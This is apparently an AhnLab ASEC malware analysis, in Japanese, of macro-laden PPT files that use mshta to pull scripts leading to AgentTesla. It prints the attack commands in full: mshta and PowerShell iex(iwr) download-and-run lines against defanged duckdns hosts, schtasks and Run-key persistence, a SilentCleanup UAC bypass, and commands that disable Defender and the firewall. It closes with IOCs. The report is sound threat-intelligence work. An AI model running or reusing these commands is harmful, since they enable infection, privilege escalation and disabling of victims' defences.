ASEC 分析チームは、昨年から拡散が続いている不正な PPT ファイルについて紹介してきた。最近では、不正な PPT ファイルで実行されるスクリプトに、様々な不正な機能が追加されたことが確認された。不正な PPT ファイルが実行される方式はこれまでに紹介してきたものと同じであり、不正なスクリプトによって追加でマルウェアの実行、Anti-AV、UAC bypass 等の機能を遂行する。
PPT ファイルを開くと、従来と同様、以下のようにマクロを含むかどうかを選択する警告ウィンドウが表示される。このとき、マクロを含むボタンを選択すると不正なマクロが自動で実行される。

不正なマクロが実行されるとパワーポイントのエラーに偽装したエラーウィンドウを表示して、ユーザーが不正な振る舞いに気づきにくいようにしている。

不正なマクロは Auto_Open() 関数により自動で実行される形式であり、不正な振る舞いに使用されるデータは難読化されている。難読化を解除すると以下のような文字列を確認することができ、shell 関数によって不正なコマンドが実行される。

不正なマクロによって実行される不正なコマンドは以下の通りであり、従来と同様 mshta プロセスによって不正な url にアクセスして追加のスクリプトを実行する。
- 不正なコマンド
“c:\windows\system32\calc\..\mshta” “hxxps://hahahahh@j.mp/rendomchrsadowkaduaowidk”
- Final URL
hxxps://download2389.mediafire.com/f68ak6xluypg/t1qm2d4ahq43wn3/2.doc
このサイトには不正な vbscript が存在し、全部で3つの振る舞いを行う。まず、Run キーに Powershell コマンドを保存したあと、そのコマンドを実行する。レジストリのパスと Powershell コマンドは以下の通りである。Powershell コマンドは二つの url に接続し、追加のスクリプトを実行する。追加のスクリプトは vbscript 以降で説明している。
- レジストリのパス
HKEY_CURRENT_USER\ SOFTWARE\Microsoft\Windows\CurrentVersion\Run:cwdfwiiuyqw
- Powershell コマンド
pOwersHelL.exe -NoProfile -ExecutionPolicy Bypass -Command i’E’x(iwr(‘hxxp://www.minpowpoin.duckdns.org/p1/2.txt’) -useB);i’E’x(iwr(‘hxxp://www.minpowpoin.duckdns.org/fin/c2.txt’) -useB);

その後、Shellexecute によってタスクスケジューラ登録コマンドを実行する。その際のコマンドは以下の通りである。タスクスケジューラに登録されるコマンドは mshta によって不正な url に接続する機能で、63分ごとにこのコマンドが繰り返される。現在、当該 url には接続が不可能である。
- タスクスケジューラ登録
schtasks /create /sc MINUTE /mo 63 /tn kwdwdwfdfabvco /F /tr MsHtA hxxp://kukadunikkk@bakuzamokxxxala.duckdns.org/b1/2.txt open

最後に、Run キーに不正な mshta コマンドを保存する。レジストリのパスとコマンドは以下の通りである。このコマンドは Run キーに登録され、再起動時に自動で実行されるようにする。現在、当該 url には接続が不可能である。
- レジストリのパス
HKEY_CURRENT_USER\ SOFTWARE\Microsoft\Windows\CurrentVersion\Run:pilodkis
- mshta コマンド
MsHTa hxxp://www.starinxxxgkular.duckdns.org/s1/2.txt

上で説明した vbscript で実行される PowerShell コマンドは2つの url に接続を試み、各 url には異なる機能を実行する不正な PowerShell コマンドが存在する。PowerShell コマンドはそれぞれマルウェアの実行、および anti-av、uac bypass 等の機能を実行する。まず、1つ目の url で実行される PowerShell コマンドは不正な .NET 実行ファイルをロードする機能を実行する。ロードされるバイナリは以下のような形式で存在し、gzip によって圧縮が解除されて実行される。

上記のような形式で計2つのバイナリが存在するが、1つは不正な振る舞いを実行する payload であり、もう1つは payload を正常なプロセスにインジェクションする機能を実行する。以下のコマンドによって不正なバイナリがロードされ、デコードされた1つ目の .NET ファイルの projFUD.alosh_rat の Execute メソッドを実行することが確認できる。また、「C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe」のパスとデコードされた2つ目の .NET ファイルを引数で実行する。

実行される Execute メソッドは以下の通りであり、aspnet_compiler.exe プロセスを生成したあと、2つ目の .NET ファイルをインジェクションして不正な振る舞いを実行する。この時、インジェクションされるファイルは情報流出型マルウェアである AgentTesla であると確認された。



2つ目の url で実行される PowerShell コマンドは、アンチウイルスプログラムのチェックおよび権限昇格等の様々な機能を実行する。以下のように特定のパスにアンチウイルスプログラムが存在する場合、「C:\Users\Public\commander.vbs」ファイルを生成して、Windows のスタートフォルダにコピー後、実行する。commander.vbs ファイルは PowerShell コマンドによって「C:\Users\Public\Comola.ps1」ファイルを実行する機能を行う。

Comola.ps1 ファイルは http://www.google.com に接続してダウンロードされる正常なスクリプトであり、アンチウイルス製品が存在する場合、不正な振る舞いが実行されないようにする。

チェック対象のアンチウイルスプログラムのパスは、以下の通りである。
– C:\Program Files\ESET\ESET Security\ecmds.exe
– C:\Program Files\Avast Software\Avast\AvastUI.exe
– C:\Program Files\Common Files\McAfee\Platform\McUICnt.exe
– C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
– C:\Program Files\AVG\Antivirus\AVGUI.exe
アンチウイルスプログラムが存在しない場合、以下のような不正な振る舞いが実行される。多数のスクリプトファイルが生成されるが、各ファイルに対する説明は以下の通りである。
1. C:\Users\Public\cooki.ps1
このファイルには特定のレジストリ値を変更する PowerShell コマンドが含まれており、レジストリ値を変更して Windows のセキュリティ通知メッセージウィンドウを無効化する。
- 変更されるレジストリ
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Security and Maintenance\Checks]
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Security and Maintenance\Checks{01979c6a-42fa-414c-b8aa-eee2c8202018}.check.100]
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Security and Maintenance\Checks{01979c6a-42fa-414c-b8aa-eee2c8202018}.check.101]
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Security and Maintenance\Checks{088E8DFB-2464-4C21-BAD2-F0AA6DB5D4BC}.check.0]
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Security and Maintenance\Checks{11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78}.check.101]
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Security and Maintenance\Checks{134EA407-755D-4A93-B8A6-F290CD155023}.check.8001] その他多数

2. C:\Users\Public\Cola.ps1
このファイルは、UAC bypass 機能を実行する。SID をチェックして、管理者の場合「C:\Users\Public\common.vbs」ファイルを実行する。管理者ではない場合、Windows サービスの SilentCleanup タスクを利用して権限を昇格する。SilentCleanup サービスは実行時に自動で昇格した権限により実行され、%windir%\system32\cleanmgr.exe ファイルを実行する。この時、環境変数 %windir% を操作することで任意のコマンドを昇格した権限で実行させることができる。このファイルでは、環境変数を以下のように変更したあと、SilentCleanup サービスを開始する。
- 環境変数の変更
powershell -ep bypass -w h $PSCommandPath;

3. C:\Users\Public\Tackel.ps1
このファイルは Windows Defender を無効化する機能を実行する。特定パス、およびプロセスを Windows Defender の例外パスとして設定し、AgentTesla がインジェクションされる aspnet_compiler.exe プロセスおよび不正な振る舞いに使用されるプロセスが含まれている。また、ホストファイルの変更および .NET Framework 3.5 機能ファイルのインストールを実行する。
- Windows Defender の例外パスおよびプロセス
C:\
D:\
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
C:\Windows\System32\kernel32.dll
explorer.exe
aspnet_compiler.exe
Mshta.exe
powershell.exe 외 다수 - Windows Defender の無効化
New-ItemProperty -Path HKLM:Software\Microsoft\Windows\CurrentVersion\policies\system -Name EnableLUA -PropertyType DWord -Value 0
Set-MpPreference -PUAProtection disable
Set-MpPreference -HighThreatDefaultAction 6
Set-MpPreference -ModerateThreatDefaultAction 6
Set-MpPreference -LowThreatDefaultAction 6
Set-MpPreference -SevereThreatDefaultAction 6
Set-MpPreference -ScanScheduleDay 8
netsh advfirewall set allprofiles state off - ホストファイルの変更
n66.254.114.41 virusscan.jotti.org

4. C:\Users\Public\common.vbs
このファイルは Tackel.ps1、cooki.ps1 ファイルを実行する。
5. C:\Users\Public\Chrome.vbs
このファイルは Cola.ps1 ファイルを実行する。
最終的に Chrome.vbs ファイルが実行される。その後、追加のファイルが順次実行されていき、アンチウイルスプログラムのチェックおよび UAC Bypass、Windows Defender の無効化等、追加のマルウェア実行のための環境が設定される。
不正な PPT ファイルは昨年から何度も変形が続いており、様々な不正な機能が追加されて配布されている。ユーザーは出どころが不明なファイルを閲覧しないようにしなければならず、ドキュメントに含まれる疑わしいマクロは実行しないようにしなければならない。
[ファイル検知]
- Downloader/PPT.Generic
- Trojan/VBS.Runner
- Trojan/PowerShell.Bypass
- Trojan/PowerShell.Disabler
[ビヘイビア検知]
- Execution/MDP.Mshta.M3546
[IOC 情報]
- eceb63e68b9c3ea9d55e1a6cb1e25d5d
- 35b2343da6d21a5cede2751026be78f8
- a6fd5561622b8c942aa40a97a4baece8
- 61cc1dac681dfcbcd8781a498684d434
- 79106a7027e6bf3aff964ccf694d99fb
- 199afc572f448386b8a72f872b64778c
- 8e7581085b48c219c5fafdf0868a644b
- hxxps://download2389.mediafire.com/f68ak6xluypg/t1qm2d4ahq43wn3/2.doc
- hxxp://www.minpowpoin.duckdns.org/p1/2.txt
- hxxp://www.minpowpoin.duckdns.org/fin/c2.txt
- hxxp://kukadunikkk@bakuzamokxxxala.duckdns.org/b1/2.txt
- hxxp://www.starinxxxgkular.duckdns.org/s1/2.txt
- https://asec.ahnlab.com/jp/27665/
- https://asec.ahnlab.com/jp/26571/
- https://asec.ahnlab.com/ko/21964/
- https://asec.ahnlab.com/jp/16732/
関連 IOC および詳細な解析情報は、AhnLab の次世代脅威インテリジェンスプラットフォーム「AhnLab TIP」サブスクリプションサービスを通して確認できる。
Categories:マルウェアの情報
[…] https://asec.ahnlab.com/jp/29329/ […]